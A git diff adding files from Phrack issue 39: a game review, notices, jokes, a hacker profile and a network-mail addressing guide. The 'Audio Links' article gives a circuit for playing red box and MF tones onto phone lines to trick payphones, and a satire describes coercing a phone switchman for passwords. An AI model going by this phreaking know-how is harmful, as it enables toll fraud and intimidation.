+spent.  Now don't tell me Steve Jackson Games has no significance for you
+(sigh).  Ok, here is how Steve tells it (in the intro to the game):
+
+-----
+
+"In 1990, Steve Jackson Games was raided by the U.S. Secret Service during a
+'hacker hunt' that went disastrously out of control.  We lost several
+computers, modems, and other equipment.  Worse, we lost the manuscripts to
+several uncompleted games, most notably _GURPS Cyberpunk_, which a Secret
+Service agent the next day called 'a handbook for computer crime.'  The company
+had to lay off half its staff, and narrowly avoided bankruptcy.
+
+"Eventually we got most of our property back (though some of it was damaged or
+destroyed).  The Secret Service admitted that we'd never been a target of their
+investigation.  We have a lawsuit pending against the officials and agencies
+responsible.
+
+"But since the day of the raid, gamers have been asking us, 'When are you going
+to make a game about it?'  Okay.  We give up.  Here it is.  Have fun."
+
+-----
+
+Weeeell...everybody naturally wants to look as good as they can, right?  For
+the real lowdown on the whole situation, a scan through some old CUDs would be
+in order, where you could find a copy of the warrant which authorized this
+raid.  I can tell you that Loyd Blankenship is the author of SJG's _GURPS
+Cyberpunk_, so draw your own conclusions.
+
+Hacker is played with cards.  This does NOT, in my view, make it a card game,
+though it is advertised that way.  It's pretty similar to Illuminati, requiring
+a lot of diplomacy, but it has a totally different flavor.
+
+The goal here is to become the mondo superhacker king of the net by getting
+access on twelve systems.  You build the net as you go along, upgrading your
+system, hacking systems, and looking for ways to screw your fellow hackers so
+they can't be king of the net before you can get around to it.  While the
+hacking aspect is necessarily resolved by a dice roll, the other aspects of
+this game ring true.  They distinguish between regular and root access on
+systems, have specific OSes, specific net types, NetHubs, secret indials, back
+doors, and, of course, the feds, which range from local police to combined
+raids from the FBI and other government authorities.
+
+This is a good game all on its own.  It's fun, it has a fair amount of
+strategy, lots of dirty dealing, and a touch of luck to spice things up.  And
+if things get too hairy and blood is about to flow, they inevitably cool down
+when someone uses a special card.  Quite a few of these are funny as hell.
+Some examples:
+
+Trashing:  Somebody threw away an old backup disk.  Bad idea.  You can leave
+           them e-mail about it...from their own account.
+
+Get A Life:  A new computer game ate your brain.  100 hours later, you beat it,
+             and you're ready to get back to hacking, but you get only one hack
+             this turn.  There is another one of these about meeting a member
+             of the opposite sex and briefly entertaining the notion that there
+             is more to life than hacking.
+
+Original Manuals:  The official system manuals explain many possible security
+                   holes.  This is good.  Some system administrators ignore
+                   them.  This is bad.  They usually get away with it because
+                   most people don't have the manuals.  This is good.  But
+                   YOU have a set of manuals.  This is very interesting.
+
+Social Engineering:  "This is Joe Jones.  My password didn't work.  Can you
+                     reset it to JOE for me?"  There is another one of these
+                     that says something about being the phone company checking
+                     the modem line, what's your root password please.
+
+And my favorite, a card designed to be played to save yourself from a raid:
+
+Dummy Equipment:  The investigators took your TV and your old Banana II, but
+                  they overlooked the real stuff!  No evidence, no bust -- and
+                  you keep your system.
+
+As you can see, this game goes pretty far toward catching the flavor of the
+real scene, though some of it is necessarily stereotypical.  Well, enough
+praise.  Here are a couple of gripes.
+
+The game is LONG.  A really nasty group of players can keep this going for
+hours.  That isn't necessarily a bad thing, but be forewarned.  A few
+modifications to shorten it up are offered, but the short game is a little like
+masturbating.  Just not as good as the real thing.
+
+There was too much work to get the game ready to play.  I've gotten used to
+some amount of setting up SJGs, and believe me, I would not have bought more
+unless they were good, and they always are, but the setup has not usually been
+such a pain.  HACKER has a lot of pieces, and a lot of them come on a single
+page, requiring you to hack them out with scissors and hope you don't do
+something retarded like cut the wrong thing off.  Once I got done with this,
+everything was cool, but this was a real pain.
+
+So, overall, what do I think?  Four stars.  If you play games, or if you're
+just massively hip to anything about hacking, get this game.  You're gonna need
+at least three players, preferably four or five (up to six can play), so if
+you only know one person, don't bother unless you have some hope of getting
+someone else to game with you.
+
+And when Dr. Death or the K-Rad Kodez Kid calls you up and wonders where you've
+been lately, just tell him you're busy dodging feds, covering your tracks, and
+hacking for root in every system you find in your quest to call yourself king
+of the net, and if he doesn't support you...well, you know what to do with
+posers who refuse to believe you're God, don't you?
+
+Muahahahahahahaahaha!
+_______________________________________________________________________________
+
+ CPSR Listserv
+ ~~~~~~~~~~~~~
+Computer Professionals for Social Responsibility (CPSR) has set up a list
+server to (1) archive CPSR-related materials and make them available on
+request, and (2) disseminate relatively official, short, CPSR-related
+announcements (e.g., press releases, conference announcements, and project
+updates).  It is accessible via Internet and Bitnet e-mail.  Mail traffic will
+be light; the list is set up so that only the CPSR Board and staff can post to
+it.  Because it is self-subscribing, it easily makes material available to a
+wide audience.
+
+We encourage you to subscribe to the list server and publicize it widely,
+to anyone interested in CPSR's areas of work.
+
+To subscribe, send mail to:
+
+        listserv@gwuvm.gwu.edu (Internet) OR
+        listserv@gwuvm (Bitnet)
+
+Your message needs to contain only one line:
+
+        subscribe cpsr <your first name> <your last name>
+
+You will get a message that confirms your subscription.  The message also
+explains how to use the list server to request archived materials (including
+an index of everything in CPSR's archive), and how to request more information
+about the list server.
+
+Please continue to send any CPSR queries to cpsr@csli.stanford.edu.
+
+If you have a problem with the list server, please contact the administrator,
+Paul Hyland (phyland@gwuvm.gwu.edu or phyland@gwuvm).
+
+We hope you enjoy this new service.
+_______________________________________________________________________________
+
+ TRW Allows Inspection
+ ~~~~~~~~~~~~~~~~~~~~~
+According to USA Today, as of April 30, you can get a free copy of your TRW
+credit report once a year by writing to:
+
+TRW Consumer Assistance
+P.O. Box 2350
+Chatsworth, CA  91313-2350
+
+Include all of the following in your letter:
+
+- Full name including middle initial and generation such as Jr, Sr, III etc.
+- Current address and ZIP code.
+- All previous addresses and ZIPs for past five years.
+- Social Security number.
+- Year of birth.
+- Spouse's first name.
+
+- A photocopy of a billing statement, utility bill, driver's license or other
+  document that links your name with the address where the report should be
+  mailed.
+_______________________________________________________________________________
+
+ The POWER Computer Lives!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+Do the words of the prophet Abraham Epstein ring true?  (Remember him from his
+correspondence in Phrack 36 Loopback?)
+
+If you don't believe that The IBM/TV Power Computer and is attempting to take
+over the world then read the following and judge for yourself.
+
+o  IBM is the worlds largest corporation.
+
+o  IBM has more in assets than most small countries.
+
+o  In 1991 IBM and it's arch enemy, Apple Computer, have joined forces to build
+   the POWER computer.
+
+o  The POWER computer will replace all existing Macintosh, PS/2, and 
+   RS/6000 machines.
+
+o  The POWER architecture will be licenced to third-party companies in order
+   that they may build their own POWER computers.
+
+o  With both Apple Computer (QuickTime) and IBM (Ultimedia) advancing their
+   work on Multimedia, it can only mean that the POWER computer will speak
+   through TV.
+
+- - - - - - - - -
+
+Here are some quotes from Harley Hahn of IBM's Advanced Workstation Division:
+
+     "PowerOpen is a computing architecture based on AIX and the POWER
+     Architecture.  To that we've added the PowerPC architecture [a low-
+     end implementation if POWER ] and the Macintosh interface and
+     applications."
+
+     "Our goal is to create the major RISC computing industry standard
+     based on the PowerPC architecture and the PowerOpen environment."
+
+     "Eventually all our workstations will use POWER"
+
+- - - - - - - - -
+
+Here's a quote from Doug McLean of Apple Computer:
+
+     "It is our intention to replace the 68000 in our entire line of
+     Macintosh computers with PowerPC chips."
+
+- - - - - - - - -
+
+The PROPHECY IS COMING TRUE.  We have no time to lose.  Unless we act quickly
+the world will come to an abrupt end as the POWER COMPUTER passes wind on all
+of us.
+
+Abraham Epstein [Big Daddy Plastic Recycling Corporation]
+                [Plastic Operations With Energy Resources (POWER)]
+_______________________________________________________________________________
+
+ Major Virus Alert
+ ~~~~~~~~~~~~~~~~~
+George Bush Virus       - Doesn't do anything, but you can't get rid of it
+                          until November.
+Ted Kennedy Virus       - Crashes your computer, but denies it ever happened.
+Warren Commission Virus - Won't allow you to open your files for 75 years
+Jerry Brown Virus       - Blanks your screen and begins flashing an 800 number.
+David Duke Virus        - Makes your screen go completely white.
+Congress Virus          - Overdraws your disk space.
+Paul Tsongas Virus      - Pops up on Dec. 25 and says "I'm Not Santa Claus."
+Pat Buchanan Virus      - Shifts all output to the extreme right of the screen.
+Dan Quayle Virus        - Forces your computer to play "PGA TOUR" from 10am to
+                          4pm, 6 days a week
+Bill Clinton Virus      - This virus mutates from region to region.  We're not
+                          exactly sure what it does.
+Richard Nixon Virus     - Also know as the "Tricky Dick Virus."  You can wipe
+                          it out, but it always makes a comeback.
+H. Ross Perot Virus     - Same as the Jerry Brown virus, only nicer fonts are
+                          used, and it appears to have had a lot more money put
+                          into its development.
+_______________________________________________________________________________
+
+ AUDIO LINKS
+ ~~~~~~~~~~~
+ By Mr. Upsetter
+
+It all started with my Macintosh...
+
+Some time ago I had this crazy idea of connecting the output from the audio
+jack of my Macintosh to the phone line.  Since the Macintosh has built in sound
+generation hardware, I could synthesize any number of useful sounds and play
+them over the phone.  For instance, with a sound editing program like
+SoundEdit, it is easy to synthesize call progress tones, DTMF and MF tones, red
+box, green box, and other signalling tones.  So I set out to do exactly this.
+I created a set of synthesized sounds as sound resources using SoundEdit.  Then
+I wrote a HyperCard stack for the purpose of playing these sounds.  Now all I
+needed was a circuit to match the audio signal from the headphone jack of my
+Mac to the phone line.
+
+
+ How The Circuit Works
+ ~~~~~~~~~~~~~~~~~~~~~
+I designed a simple passive circuit that does the job quite well.  Here is the
+schematic diagram.
+
+            +------+                       T1      +------+
+      o-----|  R1  |-----o------o--------(| |)-----|  C1  |-----o-----o
+            +------+    +|     -|        (| |)     +------+     |
+                       +---+  +---+      (| |)                +---+
+    to Mac             | D |  | D |   8  (| |) 500            |VR |   to
+   headphone           | 1 |  | 2 |  ohm (| |) ohm            | 1 |  phone
+     jack              +---+  +---+      (| |)                +---+  line
+                        -|     +|        (| |)                  |
+      o------------------o------o--------(| |)------------------o-----o
+
+C1-.22 uF, 200V
+D1,D2- 1N4148 switching diode
+R1-620 ohm, 1/4W
+T1- 8 ohm to 500 ohm audio transformer, Mouser part 42TL001
+VR1-300V MOV, Mouser part 570-V300LA4
+
+VR1 is a 300V surge protector to guard against transient high voltages.
+Capacitor C1 couples the phone line to transformer T1, blocking the phone
+line's DC voltage but allowing the AC audio signal to pass.  The transformer
+matches the impedance of the phone line to the impedance of the headphone jack.
+Diodes D1 and D2 provide clipping for additional ringing voltage protection
+(note their polarity markings in the schematic).  They will clip any signal
+above 7 volts.  Resistor R1 drops the volume of the audio signal from the Mac
+to a reasonable level.  The end result is a circuit that isolates the Mac from
+dangerous phone line voltages and provides a good quality audio link to the
+phone line.
+
+
+ Building and Using the Circut
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+This simple circuit is easy to build (if you're handy with electronics).  I
+personally prefer to solder the circuit together.  A length of shielded audio
+cable with a 1/8 inch mono plug on one end should be connected to the audio 
+input end of the circuit.  A standard RJ11 phone jack should be connected to
+the phone line end of the circuit.   Although this circuit will protect against
+dangerous phone line voltages, it is best to disconnect it when not in use.
+You just don't want to risk anything bad happening to your brand new Quadra
+900, right?
+
+Once you have an audio link between your Mac and the phone line, the
+applications are limitless.  Use HyperCard's built-in DTMF dialing to dial for
+you, or build a memory dialer stack.  Talk to people with Macintalk.  Play your
+favorite Ren and Stimpy sounds for your friends.  Play a ringback tone to
+"transfer" people to an "extension".  Build and use a set of synthesized MF
+tones.  Try to trick COCOT's with synthesized busy and reorder signals.
+
+
+ But Wait, There Is More...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~
+So you say you don't own a Macintosh?  That is ok, because the circuit can be
+used with other devices besides your Mac.  You can use it with the 8 ohm
+headphone output from tape recorders, radios, scanners, etc.  You could also
+probably use it with any other computer as long as you had the proper audio D/A
+hardware and software to create sounds.
+
+All parts are available from Mouser Electronics.  Call 800-346-6873 for a free
+catalog.
+_______________________________________________________________________________
+
+ Thank You Disk Jockey!
+ ~~~~~~~~~~~~~~~~~~~~~~
+Date: May 22, 1992
+From: Sarlo
+To: Phrack
+Subject: The Disk Jockey
+
+I was searching through some Phracks (issues 30-38), just checking them out and
+noticed something.  It's small and insignificant, I guess, but important to me
+all the same.
+
+I noticed in Disk Jockey's Prophile (Phrack 34, File 3) that he "Never got any
+thanks for keeping his mouth shut."..I dunno how to get ahold of him or
+anything, but if you drop a line to him sometime, tell him I said "thanks."
+
+-Sarlo
+_______________________________________________________________________________
+
+ An Upset Reader Responds To Knight Lightning and Phrack
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Date: Mon, 20 Apr 92 16:57 GMT
+From: "Thomas J. Klotzbach" <0003751365@mcimail.com>
+To: Knight Lightning <kl@stormking.com>
+Subject: In response to your comments of Phrack Vol 4, Issue 37, File 2 of 14
+
+    Hi,
+
+    I have a lot of respect for Phrack and all the work they are doing to
+promote an understanding of the Computer Underground.  But your comments in the
+latest issue of Phrack are what I would like to comment on.
+
+    You say:
+
+        "In short -- I speak on behalf of the modem community in general,
+        'FUCK OFF GEEK!'  Crawl back under the rock from whence you came
+         and go straight to hell!"
+
+     First, you don't speak for me and about five other people at this college.
+I have maintained throughout that the ONLY way to further the efforts of the
+Computer Underground is to destroy them with logic - not with creton-like
+comments.  Yes, you are entitled to your say - but why not take this Dale Drew
+person and destroy him with logic?  The minute that you descend to the level
+Dale Drew operates from makes you look just as ridiculous as him.
+
+     In my opinion, you came off very poorly in the exchange with Dale Drew.
+
+Thomas J. Klotzbach                             MCI Mail: 375-1365
+Genesee Community College                       Internet: 3751365@mcimail.com
+Batavia, NY 14020                               Work: (716) 343-0055 x358
+
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
+
+Dear Mr. Klotzbach,
+
+>From all of us at Phrack, this is our reply to your recent email...
+
+*******************************************************************************
+
+                       Cyber-Redneck & Shitkickin' Jim's
+                             GUIDE TO MANLY HACKING
+
+                             A Lod/GoD Presentation
+                     Legion of d0oDeZ / Gardeners of Doom!
+
+                     "You can have my encryption algorithm,
+                  when you pry it from my cold dead fingers!"
+
+
+*******************************************************************************
+
+NOW BOYS... first of all, you gotta git yerself a pickup truck.  Shitkickin'
+Jim's got one.  And you gotta get a bedliner, a toolbox, a gunrack, and a CB.
+For decoration, you have to get a confederate flag Hank Williams Jr. license
+plate, or a Harley Davidson license plate, at your option.  You also gotta get
+an NRA sticker for the back, and the Bassmaster fishing sticker (you know, the
+one that's has a fish on it).  The most mandatory requirement are two antennaes
+for your CB which are mounted on each of the side view mirrors.
+
+Now that you have your pickup truck/hackermobile, you gotta rip out the
+dashboard and mount a Data General processing unit in the front seat, cuz
+that's a manly-sounding computer name, not some pussy sounding 'puter.  You
+also have to get an Anchorman direct-connect modem, cuz that's the only thing
+left that your battery will be able to power.
+
+Not only do you have to have a pickup truck, but you gotta have rollbars, with
+foglights, armed with KC light covers so that you can see at night while you're
+trashing.
+
+THE MANLY WAY FOR A NIGHT OF HACKING
+
+NOTE:  Before you begin any journey in the hackmobile, you must get a six pack
+       of Budweiser, and a carton of Marlboro reds.  It's mandatory.
+
+Call up your buddy who owns his own trash business.  If you are a real man, ALL
+of your friends will work in this business.  Get him to take the company truck
+out (the deluxe model -- the Hercules trash truck, the one with the forklift on
+the front).
+
+HOW REAL MEN GO TRASHING
+
+Drive down to your local Bell office or garage, and empty all of the dumpsters
+into the trashtruck, by way of the convenient forklift.  This method has
+brought both me and Shitkickin' Jim much luck in the way of volume trashing.
+
+Now that you have all of your trash, go back and dump it in your backyard.  If
+you are a real man, no one will notice.  Dump it between the two broke down
+Chevette's, the ones that all the dogs will sleep under, next to the two
+barrels of wire.
+
+Go through the trash and find out who the geek is that is the switchman at the
+central office.  This shouldn't be hard.  It's the little squiggly letters at
+the bottom of the page.
+
+Next, drive to his house.  Pull your truck into his front yard.  Threaten him
+with the following useful phrase:
+
+"HAY FAY-GUT! WUT IS THE PASSWORD TO THE LOCAL COSMOS DIALUP?"
+
+"IFFIN YOU DON'T TELL ME, I'M GONNA RUN OVER YOUR PIECE OF SHIT RICE-BURNING
+COMMUNIST JAPANESE CAR WITH MY 4 BY 4 PICKUP TRUCK, GAWDDAMIT!"
+
+Then spit a big, brown, long tobaccoe-juice glob onto his shirt, aiming for the
+Bell logo.  Should he withhold any information at this point, git out of yer
+truck and walk over to him.  Grab him by his pencil neck, and throw him on the
+ground.  Place your cowboy boot over his forehead, and tell him your going to
+hogtie his ass to the front of your 4 by 4 and smash him into some concrete
+posts.  At this point, he will give in, especially noticing the numerous guns
+in the gunrack.
+
+WHAT TO DO WITH THE INFORMATION THAT YOU HAVE COVERTLY OBTAINED
+
+Don't even think about using a computer.  Make him log on to his terminal at
+home, and make him do whatever you like.  Read a copy of JUGGS magazine, or
+High Society, or Hustler, while at the same time exhibiting your mighty hacker
+power.  Enjoy the newfound fame and elitism that you will receive from your
+friends and loved ones.  GOD BLESS AMERICA!
+
+             *****************************************************
+
+This file was brought to you by Cyber-Redneck a/k/a Johnny Rotten, and
+Shitkickin' Jim a/k/a Dispater.
+
+Iffin you don't like this here file, we will burn a cross in your yard, and
+might even tell the BellCo geek to cut your line off.  He's still tied up in
+Shitkickin' Jim's basement.
+_______________________________________________________________________________
diff --git a/phrack39/3.txt b/phrack39/3.txt
new file mode 100644
index 0000000..f877bb6
--- /dev/null
+++ b/phrack39/3.txt
@@ -0,0 +1,157 @@
+                                ==Phrack Inc.==
+
+                 Volume Four, Issue Thirty-Nine, File 3 of 13
+
+                              ==Phrack Pro-Phile==
+
+                               Written by Dispater
+
+                          Created by Taran King (1986)
+
+
+     Welcome to Phrack Pro-Phile.  Phrack Pro-Phile is created to bring info to
+you, the users, about old or highly important/controversial people.  This
+month, I bring to you the one of the earlier hackers to make headlines and
+legal journals due to computer hacking...
+
+                              (_>Shadow Hawk 1<_)
+
+_______________________________________________________________________________
+
+ Personal
+ ~~~~~~~~
+             Handle:  (_>Shadow Hawk 1<_)
+            Call me:  Herb
+       Past handles:  Feyd Rautha, Captain Beyond, Mental Cancer
+      Handle origin:  Stolen from the name of an 8-bit Atari 800 game that
+                      seemed to be written in the language RGL (anyone got it
+                      for the IBM? ;-) ).
+      Date of Birth:  August 6, 1970
+Age at current date:  21
+             Height:  6'2"
+             Weight:  190 lbs.
+          Eye color:  Gray
+         Hair color:  Brown
+           Computer:  386/Linux
+
+-------------------------------------------------------------------------------
+
+     I started working with computers in the 6th grade with an Atari 800 and
+a cassette drive.  I added a modem and a disk drive and started researching
+other computer systems [checking out other hacker's conquests ;-) ].
+Eventually, I decided that UNIX was to be the OS of choice.
+
+     As a child, I was always curious about stuff in my own reality, so
+naturally, when computers became available...
+
+     I first owned an Atari 800, then an Atari ST 1040, followed by a short-
+lived Unix-PC 3B1, and a lame 20MHz 386.  Currently, I have a 33MHz 386.  Most
+of my hacking-type knowledge came from a text file that listed a few Unix
+defaults; I used those to go and learn more on my own.  Other OSes, I just
+hacked at random 8-).
+
+     I started out with systems that had already been penetrated and I built up
+my own database of systems from there.  I wasn't too clever in the beginning,
+though, and lost a few systems to perceptive sys-admins.
+
+     I specialized in Unix, though I enjoyed toying with obscure systems
+(RSX-11, Sorbus Realtime Basic, etc.)
+
+     In the hack/phreak world, I used to hang out with The Prophet, The Serpent
+(Chicago), The Warrior, and others for short periods of time, who shall remain
+nameless.
+
+     As far as what were memorable hack/phreak BBSes, I'd have to say none...
+Not that there weren't any, but I have just forgotten them all.
+
+     My accomplishments in the phreak/hack world include writing a few text
+files, typing in a few books, getting in lots of systems, and learning a bit
+about the Unix OS.  Other than that, absolutely nothing; my life is computers!
+(NOT!)
+
+     I _was_ associated with the J-Men a few years back, but that's the only
+hack/phreak group that I ever had anything to do with.
+
+     I was busted for overzealousness in penetrating AT&T computer networks and
+systems. I stupidly made calls from my unprotected home phone.  I got caught
+trying to snag Unix SysV 3.5 68K kernel source.
+
+     I had already given up the practice of sharing information when I realized
+how quickly systems went away after  their numbers and logins were posted 8-).
+After I got busted, I decided it might be best to limit my hacking to those
+strata of reality on which it is not (yet) prohibited to hack ;-) .
+
+     In real life, I originally was going to be an EE/CS major in school, but
+now, I'm leaning towards math/modeling/nonlinear dynamics.  Work when necessary
+8-|.
+
+     I'm into making music, drawing strange pictures, and exploring the nether
+regions of physical reality.  Occasionally I am seen at sci-fi conventions in
+various forms and personages.
+
+     I feel seriously against taking things too seriously.  If you can master
+that, you've got it all beat!
+
+-------------------------------------------------------------------------------
+
+ (_>Shadow Hawk 1<_)'s Favorite Things
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+        Work:  Nihilist Ontologist.
+        Cars:  Fast & Loud.
+       Foods:  I like a little of every cuisine, except those involving large
+               amounts of horseradish, beets, raw tomatoes, etc.
+       Music:  Ecumenical.
+     Authors:  R.A. Wilson is good for kicks; other than that I haven't read
+               much fiction lately.  Lots of non-fiction.
+       Books:  Illuminatus, Stranger in a Strange Land, Man or Matter, Godel
+               Escher and Bach, The Book of the SubGenius.
+  Performers:  The people at NASA, the U.S. government beings at Washington,
+               the nightly news.
+         Sex:  Yes.
+
+ Most Memorable Experience
+ ~~~~~~~~~~~~~~~~~~~~~~~~~
+ Coming home to a house full of Secret Service, FBI, NSA, DIA, and AT&T agents
+ after getting really stoned with some neighborhood friends, and then having
+ them take everything electronic that didn't appear to be a household appliance
+ EXCEPT the obviously stolen/dangerous items:  a digital power meter, a He-Ne
+ laser, and jars of chemicals for making bombs.  HUMOR AT ITS FINEST!
+
+ Some People to Mention
+ ~~~~~~~~~~~~~~~~~~~~~~
+ o  Thanks to Bill Cook for leaving no stone unturned in my personal life!
+ o  Thanks to "my" lawyer, Karen Plant, for leaving MANY stones unturned in
+    helping to decide my fate!
+ o  Thanks to the U.S. Federal Justice System for sentencing me to a 9 months
+    in a "juvenile facility" (as well as confiscating thousands of dollars of
+    stuff, some legal & some not) while allowing burglars, politicians, and
+    virus-authors to go free with a slap on the wrist!
+ o  Thanks for Operation Sun-Devil, without which, the venerable Ripco BBS
+    would still be in its first incarnation!
+
+ A Few Other Things
+ ~~~~~~~~~~~~~~~~~~
+ I'd like to thank all the great beings at Lunatic Labs for not removing my
+ account while I was sight-seeing in South Dakota.  HI! to all my TRUE friends
+ (you know who you are) and all the FALSE ones too!  Where would I be now
+ without you?  Thanks to all those who love me enough to want to control my
+ mind.  And, of course, THANKS to the hack/phreak community in general for not
+ only becoming, as most countercultures do, decadent and passe, but also for
+ still bugging me after all these years!
+
+ The Future:  well, if reality doesn't cave itself in TOO badly with all of the
+ virtuality that's on its way, it should be a great time for all to play with
+ the "net!"
+
+ Inside jokes:  HALOHALOHALOHALOHALOHALOHALOHALOHALOSKSKSKSKSKSKSKSKSKSKSKSKSK
+ eaerlyeaerlyeaerlyeaerlyeaerlyeaerly... the gwampismobile shall ride again!
+
+-------------------------------------------------------------------------------
+
+     Of the general population of phreaks you have met, would you consider most
+phreaks, if any, to be computer geeks?
+
+     Well, as far as geeking goes, all are free to pursue their interests.  It
+is important to remember that social evolution and mental evolution do not
+necessarily occur simultaneously, or instantaneously (usually).
+_______________________________________________________________________________
diff --git a/phrack39/4.txt b/phrack39/4.txt
new file mode 100644
index 0000000..8f6fd18
--- /dev/null
+++ b/phrack39/4.txt
@@ -0,0 +1,834 @@
+                                ==Phrack Inc.==
+
+                  Volume Four, Issue Thirty-Nine, File 4 of 13
+
+                              Network Miscellany V
+                         Compiled from Internet Sources
+                              by Datastream Cowboy
+
+                    Network Miscellany created by Taran King
+
+
+ University of Colorado Netfind Server
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Trying 128.138.243.151 ...
+Connected to bruno.cs.colorado.edu.
+Escape character is '^]'.
+
+
+SunOS UNIX (bruno)
+
+login: netfind
+
+=====================================================
+Welcome to the University of Colorado Netfind server.
+=====================================================
+
+I think that your terminal can display 24 lines.
+If this is wrong, please enter the "Other" menu and
+set the correct number of lines.
+
+Help/Search/Other/Quit [h/s/o/q]: h
+
+Given the name of a person on the Internet and a rough description of where
+the person works, Netfind attempts to locate information about the person.
+When prompted, enter a name followed by a set of keywords, such as
+
+        schwartz university colorado boulder
+
+The name can be a first, last, or login name.  The keys describe where the
+person works, by the name of the institution and/or the city/state/country.
+
+If you know the institution's domain name (e.g., "cs.colorado.edu", where there
+are host names like "brazil.cs.colorado.edu") you can specify it as keys
+without the dots (e.g., "cs colorado edu").  Keys are case insensitive and may
+be specified in any order.  Using more than one key implies the logical AND of
+the keys.  Specifying too many keys may cause searches to fail.  If this
+happens, try specifying fewer keys, e.g.,
+
+        schwartz boulder
+
+If you specify keys that match many domains, Netfind will list some of the
+matching domains/organizations and ask you to form a more specific search.
+Note that you can use any of the words in the organization strings (in addition
+to the domain components) as keys in future searches.
+
+Organization lines are gathered from imperfect sources.  However, it is usually
+easy to tell when they are incorrect or not fully descriptive.  Even if the
+organization line is incorrect/vague, the domain name listed will still work
+properly for searches.  Often you can "guess" the proper domain.
+
+For example, "cs.<whatever>.edu" is usually the computer science department at
+a university, even if the organization line doesn't make this clear.
+
+When Netfind runs, it displays a trace of the parallel search progress, along
+with the results of the searches.  Since output can scroll by quickly, you
+might want to run it in a window system, or pipe the output through tee(1):
+
+        rlogin <this server name> -l netfind |& tee log
+
+You can also disable trace output from the "Other" menu.
+
+You can get the Netfind software by anonymous FTP from ftp.cs.colorado.edu,
+in pub/cs/distribs/netfind.  More complete documentation is also available
+in that package.  A paper describing the methodology is available in
+pub/cs/techreports/schwartz/RD.Papers/PostScript/White.Pages.ps.Z
+(compressed PostScript) or
+pub/cs/techreports/schwartz/RD.Papers/ASCII/White.Pages.txt.Z (compressed
+ASCII).
+
+Please send comments/questions to schwartz@cs.colorado.edu.  If you would like
+to be added to the netfind-users list (for software updates and other
+discussions, etc.), send mail to:
+
+netfind-users-request@cs.colorado.edu.
+
+Help/Search/Other/Quit [h/s/o/q]: q
+
+Exiting Netfind server...
+
+Connection closed by foreign host.
+_______________________________________________________________________________
+
+ Commercial Networks Reachable From The Internet
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+ By Roman Kanala (kanala@sc2a.unige.ch), CUEPE, University of Geneva
+
+1. Internet to X.400
+====================
+
+An X.400 address in form
+
+   First name   : Fffff
+   Surname      : Nnnnn
+   Organization : Ooooo
+   ADMD         : Aaaaa
+   Country      : Cc
+
+looks in RFC822 (Internet) addressing like
+
+        /G=Fffff/S=Nnnnn/O=Ooooo/@Aaaa.Cc
+or
+    in%"/G=Fffff/S=Nnnnn/O=Ooooo/@Aaaa.Cc"
+
+
+
+2. Any X.400 to Internet
+========================
+
+My Internet address 
+
+                    kanala@sc2a.unige.ch
+
+can be written for X.400 services (like arCom400 in Switzerland,
+Sprint MAIL or MCI Mail in the USA) as follows:
+
+        C=CH; ADMD=ARCOM; PRMD=SWITCH; O=UNIGE; OU=SC2A; S=KANALA
+
+and in Internet RFC822 form (althrough I don't see any reason to do it
+this way for sending messages from Internet to Internet):
+
+       /S=Kanala/OU=sc2a/O=UniGe/P=Switch/@arcom.ch
+
+
+3. MCI Mail to Internet (via a gateway)
+=======================
+
+If you are in the USA and using MCI Mail, then you can write to Internet
+addresses as follows: 
+
+   TO:   Roman Kanala (EMS)
+   EMS:  INTERNET
+   MBX:  kanala@sc2a.unige.ch
+
+The gateway from MCI Mail to Internet is accessed by referencing the user's
+name as though he were on an EMS service.  When EMS name of INTERNET is used
+for example, in the USA, then it's in order to have NRI (Reston VA) handle the
+message for him.  When prompted for mailbox MBX, user enters the Internet
+address he is wanting to send a message to.
+
+
+4. Internet to MCI Mail
+=======================
+
+The general address form is username@mcimail.com, where the username is in one
+of two forms: either full username or the numerical box number in form of
+digits only and preceded by three zeros, for ex. 0001234567@mcimail.com
+(address 1234567 is ficticious).
+
+
+5. AppleLink to Internet or Bitnet
+==================================
+
+Internet address is used with a suffix @INTERNET#, like 
+
+    kanala@sc2a.unige.ch@internet#   
+or  kanala@cgeuge52.bitnet@internet#
+
+(here cgeuge52 is the bitnet address of sc2a.unige.ch)
+
+
+6. Internet or Bitnet to AppleLink
+==================================
+
+AppleLink address is used as if it were an Internet username on the
+AppleLink.Apple.Com node, like:
+
+CH0389@applelink.apple.com
+
+
+7. CompuServe to Internet
+=========================
+
+In the address field from CompuServe, type the symbol >, "greater than", the
+word "INTERNET" in uppercase characters, then a space followed by the Internet
+address, like:
+
+>INTERNET kanala@sc2a.unige.ch
+
+
+8. Internet to CompuServe
+=========================
+
+The CompuServe address is used followed by "@compuserve.com". In the 
+CompuServe mailbox number the comma is replaces by a period, example:
+
+12345.678@compuserve.com            (address 12345.678 is ficticious)
+_______________________________________________________________________________
+
+ Inter-Network Mail Guide
+ ~~~~~~~~~~~~~~~~~~~~~~~~
+This document is Copyright 1990 by John J. Chew.  All rights reserved.
+Permission for non-commercial distribution is hereby granted, provided
+that this file is distributed intact, including this copyright notice
+and the version information above.  Permission for commercial
+distribution can be obtained by contacting the author as described
+below.
+
+INTRODUCTION
+
+This file documents methods of sending mail from one network to another.  It
+represents the aggregate knowledge of the readers of comp.mail.misc and many
+contributors elsewhere.  If you know of any corrections or additions to this
+file, please read the file format documentation below and then mail to me:
+
+John J. Chew <poslfit@gpu.utcs.utoronto.ca>
+
+
+DISTRIBUTION
+
+(news) This list is posted monthly to Usenet newsgroups comp.mail.misc and
+  news.newusers.questions.  
+(mail) I maintain a growing list of subscribers who receive each monthly 
+  issue by electronic mail, and recommend this to anyone planning to 
+  redistribute the list on a regular basis.  
+(FTP) Internet users can fetch this guide by anonymous FTP as ~ftp/pub/docs/
+  internetwork-mail-guide on Ra.MsState.Edu (130.18.80.10 or 130.18.96.37)
+  [Courtesy of Frank W. Peters]
+(Listserv) Bitnet users can fetch this guide from the Listserv at UNMVM.
+  Send mail to LISTSERV@UNMVM with blank subject and body consisting of
+  the line "GET NETWORK GUIDE".  [Courtesy of Art St. George]
+
+
+HOW TO USE THIS GUIDE
+
+Each entry in this file describes how to get from one network to another.  To
